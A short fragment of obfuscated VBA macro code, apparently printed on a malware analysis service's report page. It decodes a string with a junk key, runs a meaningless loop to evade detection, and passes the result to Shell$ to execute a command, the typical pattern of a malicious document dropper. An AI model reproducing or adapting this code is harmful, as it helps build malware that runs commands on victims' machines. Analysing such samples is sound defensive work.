edIfCsfPNNFA = VWSWKMPYtattOHpeXW(IMkIsXtByMF("OBJECTHERE"), "jkflsajioJIOSDFAti$@*($@t($@i*t$@I924U90G42i*g@$(gsg(sdf(G4UJPIOGDE09GERUJKLSDGFJIO4TU0924T(@$i*g$i*greiiUJ9G3402--23U9RGEU9SRGJLKDFM,.CXVBNM,.DFGS;KLDFGSHJKLUI3T4*y#$%*y%#ugtreufusdJKLSFGDIO34G9HIOBNFJKDXCVHUJDFGSHUIOGRE")
End Function
Public Function RdFRwvoLGoM(DAfTCyQtIyve As String) As Long
Dim NuuNYWHUzQessxzlf, uAhMAlYLoafRVQE As Integer
NuuNYWHUzQessxzlf = 5
uAhMAlYLoafRVQE = 82
While NuuNYWHUzQessxzlf < uAhMAlYLoafRVQE
uAhMAlYLoafRVQE = uAhMAlYLoafRVQE - NuuNYWHUzQessxzlf
Wend
Shell$ DAfTCyQtIyve
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.